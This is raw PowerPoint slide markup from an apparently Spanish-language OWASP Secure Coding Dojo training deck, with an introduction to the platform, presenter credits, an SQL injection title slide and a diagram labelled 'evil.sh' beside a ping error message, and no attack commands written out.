              <a:endParaRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Google Shape;497;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15705695-B194-8A55-9E89-616282467B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4986461" y="2952928"/>
            <a:ext cx="1519936" cy="968625"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1519935" cy="968624"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="Google Shape;498;p29" descr="Graphic 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AA54A3-BF00-D88B-B257-A27E9DEADA50}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1159824" cy="968624"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Google Shape;499;p29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2043875C-C7F3-B1D3-CC40-C1D4EDD0C18B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="45719" y="0"/>
              <a:ext cx="1474216" cy="2438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000"/>
                <a:buFont typeface="Courier"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:rPr>
                <a:t>&gt;_ evil.sh</a:t>
              </a:r>
              <a:endParaRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Google Shape;500;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3AB0F44-54D4-2A15-EC88-C55A8E26F0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4379216" y="2111677"/>
            <a:ext cx="607246" cy="766668"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Google Shape;501;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A33D5451-3789-A6B6-BC84-064E9EDB6D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4379216" y="2878344"/>
            <a:ext cx="607246" cy="558897"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000">
                <a:alpha val="49803"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="8000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;502;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1277374-52D0-81FF-C8CA-3A1218BB064B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5083798" y="1884037"/>
            <a:ext cx="1077376" cy="553957"/>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4F4F4"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ping: cannot resolve ABC: Unknown host</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Google Shape;503;p29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D241D58F-436A-8C7C-26CE-6F89974FE10A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143327" y="3293781"/>
            <a:ext cx="1077376"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4F4F4"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; : )</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Google Shape;504;p29" descr="Graphic 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102AC41C-D095-008A-AC01-7E5A8ADE93BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3163768" y="2297032"/>
            <a:ext cx="1157129" cy="1157129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Google Shape;505;p29" descr="Graphic 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{626BB258-4302-0E9C-6A92-BF8058979865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="589965" y="4503101"/>
            <a:ext cx="952501" cy="952501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1289234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943F5-81B0-FD44-B590-A001E1330BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5685248" y="498765"/>
            <a:ext cx="5808662" cy="5105904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Dojo es una plataforma de capacitación en seguridad informática para desarrolladores. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Puede ser utilizada por organizaciones de todos los tamaños: desde aulas universitarias hasta grandes empresas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Siendo un proyecto originado en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Trend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Micro, (creado como herramienta de formación para desarrolladores) en 2019, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Dojo se convirtió en un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>proyecto OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>En </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> se realizó la primera traducción  de la presentación al español para para las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>meetups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> del capítulo Uruguay.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33ED612-74FE-054E-9485-8FE5CDBCC47E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2568610" y="2167116"/>
            <a:ext cx="1428750" cy="1261884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A707417F-9629-104E-9818-A59970EFE1E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="screen">
            <a:duotone>
              <a:schemeClr val="accent6">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId4">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="5107"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="79000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2181589" y="2798058"/>
            <a:ext cx="426744" cy="522210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9111B9F7-2438-A644-9398-95066BCE67EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632331" y="2009692"/>
            <a:ext cx="2383340" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE61608-FDDA-8447-939A-E9879E1FC231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632331" y="3276298"/>
            <a:ext cx="1626920" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dojo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F9F10F-EA6C-5444-8A9F-52B318B0CFF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632331" y="2659559"/>
            <a:ext cx="426744" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;91;p2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB146D8-0B42-E912-C388-1FB4C40E81E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186475" y="335525"/>
            <a:ext cx="1559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Y" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Introducción</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5160A85E-834B-1C25-E728-976D793F1803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="screen">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId6">
                    <a14:imgEffect>
                      <a14:saturation sat="43000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="21444853">
            <a:off x="421149" y="4690692"/>
            <a:ext cx="1296149" cy="1296149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF052A67-B6BF-5C27-23F5-0CFC06A5B041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21540000">
            <a:off x="2188785" y="5353585"/>
            <a:ext cx="1705376" cy="83942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70C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Paul Ionescu</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70C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>@CloudSecPaul</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B111490-B0E9-1F17-D859-93CF0C4B0037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059075" y="4706815"/>
            <a:ext cx="2214068" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Project leader &amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0"/>
              <a:t>Autor del material original</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2802483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23146-83E1-AC4A-0618-55AA7FCAB2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708146-402C-6575-3DC9-89C3A35F6A7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279122" y="294343"/>
            <a:ext cx="10515600" cy="549275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="4400" b="1" dirty="0"/>
              <a:t>Inyección</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68C545EF-5B05-6931-528F-6F312C53B159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6357244" y="2204363"/>
            <a:ext cx="6021750" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="3200" dirty="0"/>
